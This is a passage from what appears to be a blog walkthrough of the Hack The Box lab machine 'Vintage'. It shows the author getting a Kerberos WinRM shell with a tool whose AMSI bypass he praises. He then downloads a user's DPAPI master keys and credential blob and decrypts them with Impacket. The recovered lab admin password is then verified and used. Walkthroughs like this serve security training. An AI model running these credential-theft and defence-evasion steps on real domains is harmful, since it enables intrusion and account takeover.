12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Turns-out we can Shell via WinRM, now I&#8217;ll use another Kerberos and using <a href="https://github.com/byt3n33dl3/winrmrelayx">winrmrelayx as the shell provider</a>:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext"></code></pre></div><p>With -k:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo python3 evil_winrmrelayx.py C.neri@DC01.vintage.htb -k -no-pass -dc-ip 10.129.231.205 -target-ip 10.129.231.205
[*] '-port' not specified, using 5985
[*] '-url' not specified, using http://10.129.231.205:5985/wsman
[*] using domain and username from ccache: VINTAGE.HTB\C.Neri
[*] '-spn' not specified, using HTTP/DC01.vintage.htb@VINTAGE.HTB

Ctrl+D to exit, Ctrl+C will try to interrupt the running pipeline gracefully
This is not an interactive shell! If you need to run programs that expect
. . .[SNIP]. . .
  !stoplog                         # stop logging output to winrmexec_[timestamp]_stdout.log

PS C:\Users\C.Neri\Documents&gt; whoami
vintage\c.neri
PS C:\Users\C.Neri\Documents&gt; hostname
dc01</code></pre></div><ol start="7"><li><p><em>Dumping DPAPI</em></p></li></ol><p>So now best I&#8217;d do is to doing internal enumeration. . .</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ep_7!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69e1362a-1386-4fca-8d3e-b4c8d00f41ae_592x345.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ep_7!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69e1362a-1386-4fca-8d3e-b4c8d00f41ae_592x345.png 424w, https://substackcdn.com/image/fetch/$s_!ep_7!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69e1362a-1386-4fca-8d3e-b4c8d00f41ae_592x345.png 848w, https://substackcdn.com/image/fetch/$s_!ep_7!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69e1362a-1386-4fca-8d3e-b4c8d00f41ae_592x345.png 1272w, https://substackcdn.com/image/fetch/$s_!ep_7!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69e1362a-1386-4fca-8d3e-b4c8d00f41ae_592x345.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ep_7!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69e1362a-1386-4fca-8d3e-b4c8d00f41ae_592x345.png" width="592" height="345" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/69e1362a-1386-4fca-8d3e-b4c8d00f41ae_592x345.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:345,&quot;width&quot;:592,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:441789,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193435699?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69e1362a-1386-4fca-8d3e-b4c8d00f41ae_592x345.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ep_7!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69e1362a-1386-4fca-8d3e-b4c8d00f41ae_592x345.png 424w, https://substackcdn.com/image/fetch/$s_!ep_7!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69e1362a-1386-4fca-8d3e-b4c8d00f41ae_592x345.png 848w, https://substackcdn.com/image/fetch/$s_!ep_7!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69e1362a-1386-4fca-8d3e-b4c8d00f41ae_592x345.png 1272w, https://substackcdn.com/image/fetch/$s_!ep_7!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69e1362a-1386-4fca-8d3e-b4c8d00f41ae_592x345.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>After some enumeration, I discover a hidden directory in C.Neri user directory, basically it&#8217;s DPAPI potential with AppData continue to the Microsoft config.</p><p>Basically we&#8217;re required to dumped it, now the reason I use <a href="https://github.com/byt3n33dl3/winrmrelayx">winrmrelayx as shell provider</a> is also due to:</p><ul><li><p>Automated AMSI bypass</p></li><li><p>Non encoded download required</p></li></ul><p>PS: I&#8217;ve tried this step using Evil-winrm and I feel winrmrelayx save me lot&#8217;s of times.</p><p>For example:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">PS C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials&gt; dir -h


    Directory: C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials


Mode                 LastWriteTime         Length Name                                                                  
----                 -------------         ------ ----                                                                  
-a-hs-          6/7/2024   5:08 PM            430 C4BB96844A5C9DD45D5B6A9859252BA6                                      


PS C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials&gt; !download C4BB96844A5C9DD45D5B6A9859252BA6
downloading C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials\C4BB96844A5C9DD45D5B6A9859252BA6
done!
PS C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials&gt;</code></pre></div><p>Basically download everything from:</p><ul><li><p>C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials\C4BB96844A5C9DD45D5B6A9859252BA6</p></li><li><p>C:\Users\C.neri\AppData\roaming\microsoft\protect\S-1-5-21-4024337825-2033394866-2055507597-1115\4dbf04d8-529b-4b4c-b4ae-8e875e4fe847</p></li><li><p>C:\Users\C.neri\AppData\roaming\microsoft\protect\S-1-5-21-4024337825-2033394866-2055507597-1115\99cf41a3-a552-4cf7-a8d7-aca2d6f7339b</p></li></ul><p>And collect it!</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(venv)&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ ll dpapi                                          
total 12
-rw-r--r-- 1 root root 740 Apr  7 00:50 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847
-rw-r--r-- 1 root root 740 Apr  7 00:51 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b
-rw-r--r-- 1 root root 430 Apr  7 01:40 C4BB96844A5C9DD45D5B6A9859252BA6</code></pre></div><p>Now we just needed to dump.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(root&#12927;kali)-[/]
&#9492;&#9472;# dpapi.py masterkey -file dpapi/99cf41a3-a552-4cf7-a8d7-aca2d6f7339b -sid S-1-5-21-4024337825-2033394866-2055507597-1115 -password Zer0the0ne
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b
Flags       :        0 (0)
Policy      :        0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(root&#12927;kali)-[/]
&#9492;&#9472;# dpapi.py credential -file dpapi/C4BB96844A5C9DD45D5B6A9859252BA6 -key 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a 
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[CREDENTIAL]
LastWritten : 2024-06-07 15:08:23+00:00
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000001 (CRED_TYPE_GENERIC)
Target      : LegacyGeneric:target=admin_acc
Description : 
Unknown     : 
Username    : vintage\c.neri_adm
Unknown     : Uncr4ck4bl3P4ssW0rd0312</code></pre></div><p>And now we have a new pair:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">user: c.neri_adm
passwd: Uncr4ck4bl3P4ssW0rd0312</code></pre></div><p>I would also recommend try method of SharpDpapi.exe binary, why? because of the AMSI protection defender, winrmrelayx would solve the issue!!</p><p>Let&#8217;s continue.</p><ol start="8"><li><p><em>Active Directory BloodHound (Part 02)</em></p></li></ol><p>Now we own user C.Neri_ADM:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec ldap dc01.vintage.htb -u C.Neri_adm -p Uncr4ck4bl3P4ssW0rd0312 -k                                                                                 
LDAP        dc01.vintage.htb 389    DC01             [*] None (name:DC01) (domain:vintage.htb) (signing:None) (channel binding:No TLS cert) (NTLM:False)
LDAP        dc01.vintage.htb 389    DC01             [+] vintage.htb\C.Neri_adm:Uncr4ck4bl3P4ssW0rd0312 
                                                                                                                                                                                                   
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo impacket-getTGT vintage.htb/c.neri_adm:Uncr4ck4bl3P4ssW0rd0312 -k                          
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in c.neri_adm.ccache
                                                                                                                                                                                                   
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ export KRB5CCNAME=c.neri_adm.ccache</code></pre></div><p>Let&#8217;s see another BloodHound graph:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!5eyU!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd06c8d99-3319-4430-a566-b09fc05b19cb_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!5eyU!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd06c8d99-3319-4430-a566-b09fc05b19cb_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!5eyU!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd06c8d99-3319-4430-a566-b09fc05b19cb_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!5eyU!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd06c8d99-3319-4430-a566-b09fc05b19cb_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!5eyU!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd06c8d99-3319-4430-a566-b09fc05b19cb_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!5eyU!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd06c8d99-3319-4430-a566-b09fc05b19cb_1590x965.png" width="1456" height="884" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d06c8d99-3319-4430-a566-b09fc05b19cb_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:884,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:107218,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193435699?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd06c8d99-3319-4430-a566-b09fc05b19cb_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!5eyU!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd06c8d99-3319-4430-a566-b09fc05b19cb_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!5eyU!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd06c8d99-3319-4430-a566-b09fc05b19cb_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!5eyU!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd06c8d99-3319-4430-a566-b09fc05b19cb_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!5eyU!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd06c8d99-3319-4430-a566-b09fc05b19cb_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>So this guy have one OOB to &#8220;DelegatedAdmins&#8221; group.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!MNJs!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F08eb1f3f-06f7-435a-ac5c-e2e5a6472737_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!MNJs!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F08eb1f3f-06f7-435a-ac5c-e2e5a6472737_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!MNJs!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F08eb1f3f-06f7-435a-ac5c-e2e5a6472737_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!MNJs!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F08eb1f3f-06f7-435a-ac5c-e2e5a6472737_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!MNJs!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F08eb1f3f-06f7-435a-ac5c-e2e5a6472737_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!MNJs!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F08eb1f3f-06f7-435a-ac5c-e2e5a6472737_1590x965.png" width="1590" height="965" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/08eb1f3f-06f7-435a-ac5c-e2e5a6472737_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:965,&quot;width&quot;:1590,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:197730,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193435699?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F421441f9-a964-4d5b-9070-6c8008e1bb87_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!MNJs!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F08eb1f3f-06f7-435a-ac5c-e2e5a6472737_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!MNJs!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F08eb1f3f-06f7-435a-ac5c-e2e5a6472737_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!MNJs!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F08eb1f3f-06f7-435a-ac5c-e2e5a6472737_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!MNJs!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F08eb1f3f-06f7-435a-ac5c-e2e5a6472737_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Which if we manage to be part of that group we will:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!y41W!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee2e7bf5-9b5e-4341-9b81-3b5e0aebac5c_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!y41W!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee2e7bf5-9b5e-4341-9b81-3b5e0aebac5c_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!y41W!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee2e7bf5-9b5e-4341-9b81-3b5e0aebac5c_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!y41W!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee2e7bf5-9b5e-4341-9b81-3b5e0aebac5c_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!y41W!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee2e7bf5-9b5e-4341-9b81-3b5e0aebac5c_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!y41W!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee2e7bf5-9b5e-4341-9b81-3b5e0aebac5c_1590x965.png" width="1456" height="884" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ee2e7bf5-9b5e-4341-9b81-3b5e0aebac5c_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:884,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:108560,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193435699?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee2e7bf5-9b5e-4341-9b81-3b5e0aebac5c_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!y41W!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee2e7bf5-9b5e-4341-9b81-3b5e0aebac5c_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!y41W!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee2e7bf5-9b5e-4341-9b81-3b5e0aebac5c_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!y41W!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee2e7bf5-9b5e-4341-9b81-3b5e0aebac5c_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!y41W!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee2e7bf5-9b5e-4341-9b81-3b5e0aebac5c_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" 